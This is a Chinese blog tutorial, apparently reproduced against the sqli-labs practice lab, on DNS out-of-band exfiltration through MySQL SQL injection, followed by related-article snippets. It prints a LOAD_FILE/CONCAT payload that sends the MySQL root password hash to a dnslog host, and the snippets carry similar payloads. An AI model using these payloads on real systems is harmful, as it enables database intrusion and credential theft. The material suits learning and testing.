复现dns外带数据结合sqlmao

最新推荐文章于 2024-08-23 04:49:43 发布
最新推荐文章于 2024-08-23 04:49:43 发布
阅读量431 收藏
点赞数
分类专栏: web安全 python 文章标签: 前端 服务器 运维
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/ttf_ttf/article/details/126284405
版权

第一步:找一个dnslog平台

     比如:ceye.io

第二步:利用平台的payloads测试是否能收到你的dns解析记录

 第三步:检查数据的secure_file_priv是否为null,如果是就意味着只能读写,不允许导入导出,这是mysql的安全机制,那你需要改为空

打开my.ini文件

 找到这个地方 改为空

第三步:利用平台给的payload进行注入

iii. MySQL:

SELECT LOAD_FILE(CONCAT('\\\\',(SELECT password FROM mysql.user WHERE user='root' LIMIT 1),'.mysql.ip.port.b182oj.ceye.io\\abc'));

load_file是mysql中读文件的方法,常被用来读取各种配置文件

第四步:sqllabs第五关进行测试:

第五步:去平台查看是否数据带过来了,发现已经带过来了

第六步:继续查table_nam

平台继续收到数据:

 第七步:对数据进行解码

 

 

 

 

或许想学习
关注
专栏目录
dns外带数据结合sqlmap
m0_57581503的博客
08-05 213
首先我们要确保我们secure_file_priv不为null,否则load_file就不能加载文件。如果为null我们需要改为空输入。
复现dns外带数据结合sqlmap
Alemon7777777的博客
08-06 497
SQL注入即是指web应用程序对用户输入数据的合法性没有判断或过滤不严,攻击者可以在web应用程序中事先定义好的查询语句的结尾上添加额外的SQL语句,在管理员不知情的情况下实现非法操作,以此来实现欺骗数据服务器执行非授权的任意查询,从而进一步得到相应的数据信息。#查询库名#方一#方二#查询数据库的默认字符集#查询字符集的排序规则。...
dns外带数据【渗透测试】
热门推荐
leeezp的博客
09-09 32万+
上一篇文章我们已经介绍了搭建自己的dns log server 方法,接下来我将介绍如何通过dns query外带数据。下文中介绍的方法均为根据本人经验原创的方法,网上应该算是首次公开。
【技巧】DNSlog外带文件
最新发布
qinjilll的博客
08-23 1283
我们都知道DNS就是将域名解析为ip,用户在浏览器上输入一个域名A.com,就要靠DNS服务器将A.com解析到它的真实ip127.0.0.1,这样就可以访问127.0.0.1服务器上的相应服务。那么DNSlog是什么。DNSlog就是存储在DNS服务器上的域名信息,它记录着用户对域名等的访问信息,类似日志文件。我们在读取文件、执行命令注入等操作时无法明显的确认是否利用成功。
DNS外带数据结合sqlmap
S_cx666的博客
08-09 670
DNS外带数据结合sqlmap
mysql dns注入_SQL 注入-DNS 外带数据
weixin_35123047的博客
02-07 305
参考文章注:外带数据皆为数据库版本信息mysql条件:Windowsmysql.ini 中 secure_file_priv 必须为空,select @@secure_file_priv适用于联合注入或堆叠注入具体:利用 mysql (Windows 适用)中的 load_file() 函数select load_file(concat("\\\\",version(),".1ndex.dnslo...
DNSlog外带数据注入
C_LCH_2000的博客
08-04 1480
盲注代替 DNS logDNS日志,域名解析的记录。
26篇计量经济经典论文复现数据和Stata或R代码
05-01
26篇计量经济经典论文复现数据和Stata或R代码
davsod数据复现步骤davsod数据复现步骤
07-27
davsod数据复现步骤davsod数据复现步骤
mysql dns 注入_数据DNSLog外带注入-总结
weixin_29279047的博客
01-19 990
sql注入中利用的骚姿势你又知道几个?DNSLog外带注入和DNSlog带外注入?(OOB)其实是一样的,叫法不同!本人还是习惯叫外带注入,自我感觉,比较顺口为什么需要外带注入?当我们对一个数据库进行注入时,无回显,且无法进行时间注入,那么就可以利用一个通道,把查询到数据通过通道带出去,这里的通道包括:http请求、DNS解析、SMB服务等将数据带出。of course!这里主讲DNSlog外带注...
DNS外带
==
03-01 851
DNS_LOG外带 DNSLOG.cn (实际情况中你发现渗透的时候,有布尔型注入,但是很花时间,你有什么别的方法能够加快时间- 解决办法DNS_LOG外带) 普通DNS外带 http://dnslog.cn/ select load_file(concat('\\\\',(select database()),'.tqfkcu.dnslog.cn/abc')) 通过16进制编码DNS外带 select load_file(concat('\\\\',(select substr..
dnslog外带是什么
来而不往非礼也
05-14 1447
在看hw面经的时候发现了dnslog外带的相关的知识点,有点迷惑,所以写下这篇文章记录,方便日后查阅。
创新蓝队-针对DNSlog数据外带攻击的应急与预防
Liyu_6618的博客
02-01 2457
创新蓝队-针对DNSlog数据外带攻击的应急与预防
DNSlog外带
adaosanqian的博客
02-28 7572
减轻盲注的复杂操作,运用DNSlog外带来进行操作
DNS外带注入
lml_0916的博客
08-06 654
选择高级,在高级中的服务器选项中有一个禁用递归,如果是勾上的一定要取消,因为服务器就是需要递归来进行转发的,如果勾上了也转发不了了。添加主机之后就创建完成了,然后把win11的虚拟机的dns服务修改为刚刚配置的服务器的ip地址。然后勾选DNS服务器,(因为我安装了一个,所以这个我选的别的进行的演示。然后跳出弹唱就直接选择下一步,就可以,然后默认它的选项选择主要区域,然后点击下一步。填写主机名称和IP,名称就写的是ns,IP地址为你sqlmap所在虚机的ip地址。然后建立一个区域名称,这里就随便写就可以了。.
Python实现DNSlog自动识别外带
不凡乃大的博客
06-07 555
python实现dnslog外带
sqlmap + dnslog外带数据
CYLK1987310466的博客
08-06 1060
sqlmap dnslog外带数据
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值